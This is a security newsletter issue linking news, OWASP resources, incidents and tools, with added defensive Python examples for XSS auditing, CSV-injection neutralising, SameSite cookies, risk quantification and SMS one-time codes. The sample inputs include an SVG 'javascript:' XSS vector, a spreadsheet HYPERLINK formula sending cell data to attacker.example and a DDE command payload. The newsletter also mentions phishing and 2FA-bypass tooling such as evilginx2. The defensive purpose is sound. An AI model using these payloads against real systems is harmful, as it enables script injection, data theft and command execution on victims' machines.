Security Stack Sheet #83

Word of the week

“The Lift-and-Shift Dragon”

The Definitive Guide to Cloud Migration in the Enterprise: Here Be Dragons!

The most common (and most deadly!) of the dragons goes by the name of Lift-and-Shift.

The Lift-and-Shift Dragon emerges when you take your existing data centre workloads and move them to the cloud without any changes.

This dragon rears its ugly head when the leadership decrees that you must adopt the cloud…and that’s about it. In the face of tight deadlines and a back-of-a-napkin strategic vision your teams inevitably attempt to get to the cloud in the quickest, bluntest and most efficient way possible. Lifting and shifting your workloads, as they are, into the cloud is without doubt the fastest way to get to the cloud, and showing fast progress is attractive. However, this approach is quick only in the sense that driving straight across pavements and through red lights is the ‘quickest’ way to get to work. Both result in disaster.

Link HERE

 

Bonus


Link HERE

Link HERE


Link HERE


Link HERE

IRpair & Phantom – Privacy Eyewear

Sunglasses designed to block Facial Recognition & Infrared Radiation.

Link HERE – thanks to Naz


Link HERE


Link HERE


Link HERE


Link HERE

Crypto challenge of the week

Compromise a web server running WordPress, obtain a low-privileged user and escalate your privileges to root using a Python module.

Link HERE

 

Dates

  • May 25th 2018: almost two years of GDPR live! See the incidents section below. GDPR Enforcement Tracker Link HERE – thanks to Marius

DLA Piper GDPR Data Breach Survey 2020

Over 160,000 data breach notifications have been reported across the 28 European Union Member States plus Norway, Iceland and Liechtenstein since the GDPR came into force on 25 May 2018.

  • France is the country with the highest total amount of fines during the period, far ahead of Germany and the UK (UK figures do not yet include the two public notices of intent to fine, totalling £282 million, as they had not been finalised and imposed at the time the report was written)
  • Austria, while a small country in terms of population, comes in third place


Link HERE – thanks to Christophe

  • 1st January 2020 – The California Consumer Privacy Act (CCPA) becomes effective Link HERE
  • Now: TLS 1.2 is mandatory for proper security; HTTPS everywhere HERE
  • DO NOT DELAY the TLS 1.2 migration past JUNE 2020 or A FEW THINGS WILL STOP WORKING!

[Browsers, Office365, Cisco and many others]

  • January 2020 – Qualys SSL Labs rates any server that still supports TLS 1.0 or TLS 1.1 as B at best – Qualys will downgrade you HERE DONE

Update 1/31/2020: The grade change is now live on www.ssllabs.com. Servers that support TLS 1.0 or TLS 1.1 are capped to B grade.

  • June 2020 – Microsoft plans to deprecate TLS versions 1.0 and 1.1 in Office 365 and Office 365 GCC – HERE
  • 31st of January 2020 – Brexit DONE

Source comic book: V for Vendetta

  • November 3rd 2020: US presidential election (Trump running for a second term)

Did the Saudi Crown Prince really hack Jeff Bezos’s phone?

Link HERE and then Facebook blames Apple for the hack HERE

  • 2022 – First trip to Mars according to Elon Musk
  • 2023 – 3DES is deprecated for all new applications and its use is disallowed after 2023 HERE
  • 2024 – Back to the Moon according to Trump and NASA

Book of the month

The Cybersecurity Playbook: How Every Leader and Employee Can Contribute to a Culture of Security by Allison Cerra

Link HERE

Uncanny Valley

The truth is always messier, more interesting and more human. It is a central tension animating Anna Wiener’s excellent memoir, “Uncanny Valley.” The book traces Wiener’s navigating the tech world as a start-up employee in the mid 2010s — what might be thought of as the last years before Silicon Valley’s fall from darling status. Wiener said she was drawn into the tech world by its propulsive qualities. Graduating into a recession and spending her early 20s in publishing, tech offered opportunities: jobs, the seductive feeling of creating something and, of course, the money was good.

But what makes “Uncanny Valley” so valuable is the way it humanizes the tech industry without letting it off the hook. The book allows us to see the way that flawed technology is made and marketed: not by villains, but by blind spots, uncritical thinking and armies of ambivalent people coming into work each day trying their best — all while, sometimes unwittingly, laying the foundation of the surveillance economy.

From a privacy standpoint, “Uncanny Valley” is helpful in understanding what it’s like being on the other end of the torrent of information that streams from our devices each minute. Early on, Wiener recounts working for a successful data analytics company and the gold rush toward big data, noting that “not everyone knew what they needed from big data, but everyone knew that they needed it.”

When confronted with the mass of information her company collected, Wiener describes feeling uncomfortable with the “God Mode” view that granted employees full access to user data. “This was a privileged vantage point from which to observe the tech industry, and we tried not to talk about it,” she writes. This, she notes, becomes a pattern. When Edward Snowden blew the whistle on the National Security Agency’s Prism program in 2013, employees at her own data company never discussed the news.

Link HERE

Interview with Jim McKay

During the Solothurn Film Festival 2020 we had the opportunity to meet Jim McKay, who directed, among others, two episodes of Mr. Robot season one. Jim also had time for a short interview.

“I love hacking can be used for the greater good.”

Link HERE

Comic of the week

Looks Like A Duck - Dilbert by Scott Adams

##Some OWASP stuff first

-SAMM release v2

The new SAMM release v2 consists of the following components:

  • The SAMM Model overview and introduction, explaining the maturity model in detail;
  • A Quick-Start Guide with different steps to improve your secure software practice;
  • Updated SAMM Tool Box to perform SAMM assessments and create SAMM road maps;
  • A new SAMM Benchmark Initiative to compare your maturity and progress with other similar organizations and teams

Link HERE

-AppSec Podcast – DJ Schleen — DevOps: The Sec is Silent

DJ Schleen is a seasoned DevSecOps advocate at Sonatype and provides thought leadership to organizations looking to integrate security into their DevOps practices. He encourages organizations to deeply integrate a culture of security and trust into their core values and product development journey.

DJ joins us to talk about the philosophy of DevOps and flow, DevSecOps and silos, and the DevSecOps reference architectures. We hope you enjoy this conversation with… DJ Schleen

Link HERE

-OAuth and OpenID Connect: Security Best Practices

Link HERE – thanks to Mike

-Improve Your Secure Score in Azure Security Center

Link HERE

-OWASP Top 10 Proactive Controls latest by Jim Manico

Link HERE

-What’s new and exciting about the ASVS 4.0

Link HERE

-Remember: Developer’s Guide to Common Vulnerabilities and How to Prevent Them

Link HERE

-SVG animate XSS vector

As part of my recent research into obfuscating XSS payloads to bypass WAFs, I was looking at the SVG elements set, animate, animateTransform and animateMotion. I added a couple of known XSS vectors to the cheat sheet using those tags. Then, focusing on the animate tag, I found an interesting XSS vector using the values attribute.

Link HERE
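The point of the vector above is that the dangerous URL never appears in an href attribute: a SMIL child element writes it into the parent’s href at runtime, so a sanitizer that only checks static href/xlink:href values lets it through. The following is an added example (not code from the post or the cheat sheet) of an audit that catches this class of markup. The malicious sample is a constructed string mirroring the animate/values vector the post describes; the element, attribute and scheme lists are my own choices.

```python
"""Audit SVG/HTML markup for SMIL animations that inject a javascript: URL.

Added example. Sanitizers that only inspect static href/xlink:href attributes
miss an <animate>, <set>, <animateTransform> or <animateMotion> child that
rewrites its parent's href at runtime through values/to/from/by.
"""
import re
from html.parser import HTMLParser

ANIMATION_TAGS = {"animate", "set", "animatetransform", "animatemotion"}
URL_ATTRIBUTE_TARGETS = {"href", "xlink:href"}
VALUE_CARRYING_ATTRS = ("values", "to", "from", "by")
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")


def _normalise(url: str) -> str:
    """Lower-case and drop whitespace/control characters that browsers skip
    when parsing a URL scheme (e.g. 'java\\tscript:' or ' JavaScript:')."""
    return re.sub(r"[\s\x00-\x1f]", "", url).lower()


def is_dangerous_url(candidate: str) -> bool:
    return _normalise(candidate).startswith(DANGEROUS_SCHEMES)


class _SmilUrlAuditor(HTMLParser):
    """Collects (tag, attribute, payload) for animations aimed at a URL attribute."""

    def __init__(self):
        # html.parser decodes &#106;avascript: in attribute values for us
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser already lower-cases tag and attribute names.
        if tag not in ANIMATION_TAGS:
            return
        attr_map = {name: (value or "") for name, value in attrs}
        target = attr_map.get("attributename", "").strip().lower()
        if target not in URL_ATTRIBUTE_TARGETS:
            return
        for attr in VALUE_CARRYING_ATTRS:
            if attr not in attr_map:
                continue
            # `values` is a semicolon-separated keyframe list; one bad frame is enough.
            for keyframe in attr_map[attr].split(";"):
                if is_dangerous_url(keyframe):
                    self.findings.append((tag, attr, keyframe.strip()))


def find_animated_url_injections(markup: str):
    """Return a list of (tag, attribute, payload); an empty list means nothing found."""
    auditor = _SmilUrlAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


# Constructed samples: the first mirrors the animate/values vector described
# in the post, the second is a benign animation a sanitizer must not reject.
MALICIOUS_SVG = (
    '<svg><a><animate attributeName=href values=javascript:alert(1) />'
    '<text x=20 y=20>Click me</text></a></svg>'
)
BENIGN_SVG = (
    '<svg><circle r="10"><animate attributeName="r" values="10;20;10" '
    'dur="2s" repeatCount="indefinite"/></circle></svg>'
)

if __name__ == "__main__":
    print(find_animated_url_injections(MALICIOUS_SVG))
    print(find_animated_url_injections(BENIGN_SVG))
```

The check is deliberately on the parsed attribute value, after entity decoding and whitespace stripping, because that is the form the browser acts on; matching the raw text of the markup with a WAF regex is exactly what the obfuscation research above is designed to defeat.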

-Remember: CSV Injection

Link HERE
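As a reminder of what the CSV injection item is about, here is an added example (my own code, not from the linked article) of the export-side fix: any cell that a spreadsheet would evaluate as a formula gets a leading apostrophe, and every cell is quoted so a payload cannot break out of its field. The sample rows are constructed; the attacker-controlled values are typical HYPERLINK and DDE-style payloads.

```python
"""Neutralise CSV (formula) injection when exporting user-supplied data.

Added example. Spreadsheets treat a cell beginning with '=', '+', '-', '@',
a tab or a carriage return as a formula, so an attacker who controls a
field such as a display name can smuggle a HYPERLINK that exfiltrates the
sheet, or a DDE payload such as =cmd|' /C calc'!A0, into a report that
another user opens on their own machine.
"""
import csv
import io
from numbers import Number

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value) -> str:
    """Return a cell that spreadsheets will read as text, never as a formula."""
    if isinstance(value, Number):
        # Genuine numbers (including negatives) come from our own code, not
        # from the attacker; keep them numeric so the column still sums.
        return str(value)
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        # A leading apostrophe is the spreadsheet convention for "this is text".
        text = "'" + text
    return text


def export_rows_as_csv(rows) -> str:
    """Serialise rows (iterables of cells) with every cell quoted and neutralised."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        # QUOTE_ALL wraps each cell in double quotes and doubles any embedded
        # quote, so a payload cannot terminate its cell early either.
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buffer.getvalue()


def rows_from_csv(text: str):
    """Read the export back; used to show the payload now arrives as plain text."""
    return list(csv.reader(io.StringIO(text)))


# Constructed sample: the "note" column is attacker-controlled input.
SAMPLE_ROWS = [
    ["user", "balance", "note"],
    ["alice", -42.5, 'plain "quoted" text'],
    ["mallory", 10, '=HYPERLINK("https://attacker.example/?"&A1,"open")'],
    ["eve", 0, "@SUM(1+1)*cmd|' /C calc'!A0"],
]

if __name__ == "__main__":
    print(export_rows_as_csv(SAMPLE_ROWS), end="")
```

The trade-off is visible in the output: the apostrophe is part of the cell text, and some viewers show it. Apply the neutralisation only to fields that originate from untrusted input, and keep numeric columns numeric, otherwise the report loses the arithmetic the analyst needs.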

 

Events

OWASP events HERE

All InfoSec events HERE

AppSec Cali 2020

Slides HERE

An Opinionated Guide to Scaling Your Company’s Security

Link HERE

[tl;dr sec] #22 – Post AppSec Cali, K8s Security Monitoring at Scale

DevSecOps talks & tools from AppSec Cali, PoCs to decrypt WhatsApp messages, Kubernetes monitoring and CTF, Python static analysis tools

Link HERE

GitHub Security Meetup – Jan 22, 2020 – San Francisco

Link HERE

Application Security in the Age of Cyber War


Link HERE

Cyber ​​News TV

The International Cybersecurity Forum (FIC) team launches Cyber News, a new TV, web and radio medium entirely dedicated to cybersecurity. The idea: to aggregate cyber content of various formats and sources, to better inform and raise awareness on digital security issues.

Link HERE

The Lawfare Podcast: Renee DiResta on Disinformation and Misinformation From Vaccines to the GRU

Link HERE

Webcast – Designing a Secure Microservices Architecture


Link HERE

 

Incidents

Global ALERT level


BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred. 

Incident data HERE Find your country


NCSC Weekly Threat Report


Citrix release patches to fix product vulnerability

Patches which fix a vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway have been released.

We reported on the security issues earlier this month and also published an alert offering mitigation advice to those affected by the vulnerability. That alert has now been updated to version 2.0 and carries the relevant links to the released fixes.

Cyber security measures being considered ahead of Japan 2020

Ahead of the 2020 Olympic and Paralympic Games, a panel of experts in the Ministry of Internal Affairs and Communications in Japan has proposed a set of emergency measures to strengthen cyber security defences.

UK decision on high risk vendors

This week the government announced that new restrictions should be placed on the use of high risk vendors (HRVs) in the UK’s 5G and gigabit-capable networks.

As part of the Department for Digital, Culture, Media and Sport’s (DCMS) Telecoms Supply Chain Review, the NCSC carried out a technical and security analysis of what is needed to protect the UK’s digital infrastructure.

Link HERE – Report Vulns to NCSC HERE

API Security Issue 68: API security in Gartner Hype Cycle, McAfee threat predictions for 2020

Link HERE

Troy Hunt Blog – Issue 176

Link HERE

Unsupervised Learning 213

Link HERE

Incidents & events detail

Hacker leaks passwords for more than 500,000 servers, routers, and IoT devices

The list was shared by the operator of a DDoS booter service

Link HERE

YouTube tackles trolls with Profile cards, comment history records

The testing period is over and Android users will soon be able to check commenter logs

Link HERE

WordPress plugin vulnerability can be exploited for total website takeover

The “easily exploitable” bug in WP Database Reset has serious consequences for webmasters

Link HERE

Zoom Fixes Video Conferencing Vulnerability

Zoom has fixed a flaw in its video conferencing tool’s URL scheme that could have been exploited to eavesdrop on meetings. Prior to the fix, Zoom meetings did not require passwords by default, which means that anyone who guessed the meeting ID number could join. Zoom learned of the issue in July 2019 and fixed the issue: passwords are now required by default for all scheduled meetings. Zoom made other security enhancements as well.
[Neely]
Zoom also has a setting to lock a meeting in progress so that others cannot join, which could be useful when having sensitive conversations

Link HERE

Microsoft Issues Excel Security Alert As $100 Million ‘Evil Corp’ Campaign Evolves

Link HERE

A Less Known Attack Vector, Second Order IDOR Attacks

Link HERE

Trello exposed! Search turns up huge trove of private data

Link HERE

Remember: Capture NTLM Hashes using PDF (Bad-Pdf)

Link HERE

How the most damaging ransomware evades IT security


Link HERE

FireEye Acquires Cloud Governance Firm Cloudvisory

Link HERE

Research of the week

Featuring – Upcoming Browser Behaviour Changes: What Developers Need to Know

Learn about upcoming changes to browser cookie behaviour that may make your web applications incompatible.

What Might Be Affected?

Here’s a list of the scenarios that are most likely to be affected by the changes:

-Integrations with Identity Providers using protocols such as SAML 2.0 or OpenID Connect.

-Embedding web application content from a third-party domain.

-Querying APIs from a third-party domain.

Web Application Sign-In using Identity providers after changes

Note: this is not an exhaustive list

Link HERE
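The article does not name the mechanism, so for the record: the change that breaks the three scenarios listed above is browsers (Chrome 80 onwards, February 2020) treating a cookie that carries no SameSite attribute as SameSite=Lax, and rejecting SameSite=None cookies that are not also Secure. The following added example (my own simplified model, not browser code and not from the article) shows why a session cookie set the old way stops arriving on a SAML response POST, in an embedded frame, or on a cross-domain API call, and what the Set-Cookie header has to say instead. The Cookie and Request classes and the scenario names are constructed for the illustration; the model ignores Chrome’s temporary two-minute “Lax+POST” exception.

```python
"""Model of the SameSite=Lax-by-default cookie behaviour (added example).

Simplified illustration, not browser code. Rules modelled:
  - no SameSite attribute            -> treated as Lax
  - SameSite=None without Secure      -> cookie rejected outright
  - Lax  -> same-site requests, plus cross-site *top-level* safe-method navigations
  - Strict -> same-site requests only
  - None -> everywhere (must be Secure, so https only)
"""
from dataclasses import dataclass
from typing import Optional

SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}
VALID_POLICIES = {"Strict", "Lax", "None"}


@dataclass(frozen=True)
class Cookie:
    name: str
    same_site: Optional[str] = None  # "Strict", "Lax", "None", or omitted
    secure: bool = False


@dataclass(frozen=True)
class Request:
    cross_site: bool            # initiator's site differs from the cookie's site
    top_level_navigation: bool  # address bar changes: redirect, form POST, link click
    method: str = "GET"
    https: bool = True


def effective_same_site(cookie: Cookie) -> Optional[str]:
    """Policy the browser applies; None means the cookie is dropped entirely."""
    policy = (cookie.same_site or "Lax").capitalize()
    if policy not in VALID_POLICIES:
        policy = "Lax"                      # unknown values fall back to the default
    if policy == "None" and not cookie.secure:
        return None                         # SameSite=None requires Secure
    return policy


def will_be_sent(cookie: Cookie, request: Request) -> bool:
    policy = effective_same_site(cookie)
    if policy is None:
        return False
    if cookie.secure and not request.https:
        return False                        # Secure cookies never travel over http
    if policy == "None" or not request.cross_site:
        return True
    if policy == "Lax":
        # Cross-site: only top-level navigations with a safe method carry Lax cookies.
        return request.top_level_navigation and request.method.upper() in SAFE_METHODS
    return False                            # Strict: never on cross-site requests


def set_cookie_header(name: str, value: str, used_cross_site: bool) -> str:
    """Build a Set-Cookie header that survives the new defaults.

    A cookie that must arrive on a cross-site POST (SAML response to the ACS,
    OIDC form_post) or inside a third-party frame needs SameSite=None; Secure.
    Everything else should state Lax explicitly rather than rely on the default.
    """
    same_site = "None" if used_cross_site else "Lax"
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite={same_site}"


# The article's three scenarios, plus a plain cross-site link, as constructed requests.
SAML_RESPONSE_POST = Request(cross_site=True, top_level_navigation=True, method="POST")
EMBEDDED_FRAME_GET = Request(cross_site=True, top_level_navigation=False, method="GET")
CROSS_SITE_API_CALL = Request(cross_site=True, top_level_navigation=False, method="POST")
LINK_FROM_OTHER_SITE = Request(cross_site=True, top_level_navigation=True, method="GET")

if __name__ == "__main__":
    legacy = Cookie("session", same_site=None, secure=True)   # pre-2020 style
    fixed = Cookie("session", same_site="None", secure=True)
    for label, req in [("SAML POST", SAML_RESPONSE_POST), ("iframe", EMBEDDED_FRAME_GET),
                       ("API call", CROSS_SITE_API_CALL), ("link", LINK_FROM_OTHER_SITE)]:
        print(f"{label:10} legacy={will_be_sent(legacy, req)!s:5} fixed={will_be_sent(fixed, req)}")
```

Two caveats a practitioner hits immediately: SameSite=None is only honoured over HTTPS, so development setups on plain http lose the cookie entirely; and a handful of older clients (notably Safari on iOS 12 and macOS 10.14) misread SameSite=None as Strict, which is why many frameworks sniff the User-Agent and omit the attribute for those clients.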

Attacking Azure, Azure AD, and Introducing PowerZure

Over the past decade, Azure’s presence in businesses has grown significantly as new features and support were added to Azure. The purpose of this article is to cover three main points:

  • Explain the components of Azure and how they fit into a modern IT environment.
  • Explain how certain things within Azure can be leveraged from an offensive perspective.
  • Introduce the PowerZure project and explain how it helps offensive operations against Azure.
    https://github.com/hausec/PowerZure

Link HERE

Open-Sourcing riskquant, a library for quantifying risk

Netflix has a program in our Information Security department for quantifying the risk of deliberate (attacker-driven) and accidental losses. This program started on the Detection Engineering team with a home-grown Python library called riskquant, which we’ve released as open source for you to use (and contribute to). Since that library was written, we have hired two amazing full-time Risk Engineers (Prashanthi Koutha and Tony Martin-Vegue) who are expanding rigorous quantified risk across the company.

The Factor Analysis of Information Risk (FAIR) framework describes best practices for quantifying risk, which at the highest level of abstraction involves forecasting two quantities:

  • Frequency of loss: How many times per year do you expect this loss to occur?
  • Magnitude of loss: If this loss occurs, how bad will it be? (Low-loss scenario to high-loss scenario, representing a 90% confidence interval)

Link HERE
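To make the two forecast quantities concrete, here is an added example (standard-library Python written for this page, not riskquant’s own code) that turns a frequency and a 90% magnitude interval into an annualised loss figure, both in closed form and by Monte Carlo. The frequency is treated as a Poisson rate and the magnitude interval is fitted to a lognormal, the usual choice for positive, right-skewed losses; whether riskquant fits its distribution exactly this way is not something this example relies on. The scenario numbers are constructed.

```python
"""FAIR-style annualised loss from two forecasts (added example).

Not riskquant's code: a stdlib-only illustration of the two inputs the post
lists. Frequency = expected loss events per year (Poisson rate). Magnitude =
a 90% confidence interval (low, high) for a single event, i.e. its 5th and
95th percentiles, fitted to a lognormal distribution.
"""
import math
import random

Z_95 = 1.6448536269514722  # standard normal quantile at 0.95 (two-sided 90%)


def lognormal_params(low: float, high: float):
    """Return (mu, sigma) of the lognormal whose 5th/95th percentiles are low/high."""
    if not 0 < low < high:
        raise ValueError("magnitude interval must satisfy 0 < low < high")
    mu = (math.log(low) + math.log(high)) / 2
    sigma = (math.log(high) - math.log(low)) / (2 * Z_95)
    return mu, sigma


def expected_annual_loss(frequency: float, low: float, high: float) -> float:
    """Closed form: events per year x mean of the single-event lognormal."""
    mu, sigma = lognormal_params(low, high)
    return frequency * math.exp(mu + sigma ** 2 / 2)


def _poisson(rng: random.Random, lam: float) -> int:
    """Knuth's multiplication method; adequate for the small rates FAIR uses."""
    threshold, k, p = math.exp(-lam), 0, 1.0
    while True:
        p *= rng.random()
        if p < threshold:
            return k
        k += 1


def simulate_annual_losses(frequency, low, high, years=20000, seed=1):
    """Monte Carlo: total loss in each of `years` simulated years (reproducible)."""
    rng = random.Random(seed)
    mu, sigma = lognormal_params(low, high)
    totals = []
    for _ in range(years):
        events = _poisson(rng, frequency)
        totals.append(sum(rng.lognormvariate(mu, sigma) for _ in range(events)))
    return totals


def summarise(totals):
    """Mean plus the tail figures a risk register usually asks for."""
    ordered = sorted(totals)
    n = len(ordered)

    def pick(q):
        return ordered[min(n - 1, int(q * n))]

    return {
        "mean": sum(ordered) / n,
        "p50": pick(0.50),
        "p95": pick(0.95),
        "prob_no_loss": sum(1 for t in ordered if t == 0) / n,
    }


# Constructed scenario: account-takeover incident forecast at one event every
# two years, costing between 10k and 1M per event (90% confidence).
SCENARIO = dict(frequency=0.5, low=10_000, high=1_000_000)

if __name__ == "__main__":
    print("closed-form annualised loss:", round(expected_annual_loss(**SCENARIO)))
    print(summarise(simulate_annual_losses(**SCENARIO)))
```

The simulation is worth keeping next to the closed form: the mean hides that in roughly 60% of simulated years this scenario costs nothing at all, while the 95th percentile year is several times the mean, and it is the tail that budgets and insurance decisions are made against.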

Fuzzing software: common challenges and potential solutions (Part 1)

In this two-part blog series, we’ll review some of the challenges we commonly face in our fuzzing workflows and provide ways to address these challenges. We’ll also discuss a variety of fuzzing methodologies and strategies that can improve our results.

As a practical example we’ll use vulnerabilities we found in VLC Media Player through our fuzzing efforts with the AFL and AFL++ toolchains.

Link HERE

Tool of the week

Kali Linux 2020.1 Released!


Link HERE

Delivering origin-bound one-time codes over SMS

End users shouldn’t have to manually copy-and-paste one-time codes from SMSes to their browser.

Sites should be able to trust that the one-time codes they send over SMS will only be entered on the originating site.

Link HERE
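The proposal achieves the second property with a message format rather than with cryptography: the human-readable text is followed by a final line of the form “@<host> #<code>” naming the site the code is for, and the browser releases the code only to a page on that host. The following added example (my own code, not the proposal’s or any browser’s) implements both ends of that contract: the server-side formatter and the client-side check that refuses to hand the code to a different host, which is the whole point against phishing. The sample messages are constructed.

```python
"""Format and verify origin-bound one-time codes delivered over SMS (added example).

Not browser or proposal code. Message format: free text, then a last line
"@<host> #<code>". A client should only surface the code to the https
origin whose host matches; a phishing page on another host gets nothing,
and a legacy SMS without the binding line is not auto-filled anywhere.
"""
import re
from urllib.parse import urlsplit

# Last line: '@' host (optionally with an explicit port), whitespace, '#' code.
_ORIGIN_LINE = re.compile(r"^@(?P<host>[A-Za-z0-9.-]+(?::\d+)?)\s+#(?P<code>\S+)$")


def format_origin_bound_sms(host: str, code: str, human_text: str) -> str:
    """Server side: append the machine-readable binding as the final line."""
    if not _ORIGIN_LINE.match(f"@{host} #{code}"):
        raise ValueError("host or code contains characters the format does not allow")
    return f"{human_text.rstrip()}\n\n@{host.lower()} #{code}"


def parse_origin_bound_sms(message: str):
    """Return (host, code) from the final line, or None if the SMS is not bound."""
    lines = message.rstrip().splitlines()
    if not lines:
        return None
    match = _ORIGIN_LINE.match(lines[-1].strip())
    if match is None:
        return None
    return match.group("host").lower(), match.group("code")


def code_for_origin(message: str, origin: str):
    """Client side: release the code only to the https origin named in the SMS."""
    parsed = parse_origin_bound_sms(message)
    if parsed is None:
        return None
    host, code = parsed
    parts = urlsplit(origin)
    if parts.scheme != "https" or parts.netloc.lower() != host:
        return None
    return code


# Constructed messages.
BOUND_SMS = format_origin_bound_sms(
    "example.com", "747723", "747723 is your ExampleApp verification code."
)
LEGACY_SMS = "Your code is 747723. Do not share it with anyone."

if __name__ == "__main__":
    print(repr(BOUND_SMS))
    print(code_for_origin(BOUND_SMS, "https://example.com"))            # 747723
    print(code_for_origin(BOUND_SMS, "https://example.com.evil.test"))  # None
    print(code_for_origin(LEGACY_SMS, "https://example.com"))           # None
```

Note what the binding does and does not give you: it stops a user being auto-prompted to paste the code into a look-alike site, but the code itself is still a six-digit secret in an SMS, so SIM-swap and SS7 interception are unchanged.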

Introducing Microsoft Application Inspector

Link HERE – thanks to Jachar

Link HERE

evilginx2

Man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows bypassing 2-factor authentication protection.


Link HERE

Two Factor Auth (2FA)

List of websites and whether or not they support 2FA


Link HERE

This New Facebook Tool Reveals How You Are Being Tracked Online


Link HERE

Use TypeScript to Create a Secure API with Node.js and Express: Getting Started

Link HERE

Syntribos – Python API security testing tool

Syntribos is an open source automated API security testing tool that is maintained by members of the OpenStack Security Project

Link HERE – thanks to Alvin

Other interesting articles 

##5 Steps to Implement DevSecOps

  • Security teams are not growing proportionally to the tools they purchase. And…
  • Cryptographer Bruce Schneier was right: Security tools don’t make us more secure, processes do.

Link HERE

##Combining AI and Playbooks to Predict Cyberattacks

Link HERE

AND

MTTD and MTTR: Two Metrics to Improve Your Cybersecurity

Link HERE

 

##Goodbye, Clean Code

My colleague has just checked in the code that they’ve been writing all week. We were working on a graphics editor canvas, and they implemented the ability to resize shapes like rectangles and ovals by dragging small handles at their edges.

The code worked.

But it was repetitive…

Link HERE

 

##And finally, Robotics and AI will create millions of jobs by 2030 and we barely know what they are yet


Link HERE

##HACKING, TOOLS and FUN – CHECK BELOW!

AppSec Ezine

Must see

URL: https://lapcatsoftware.com/articles/Safari-runs-disabled-extensions.html

Description: Safari runs disabled extensions.

URL: https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses

Description: Exploiting email address parsing with AWS SES.

Links HERE and credits to HERE

 

 

 
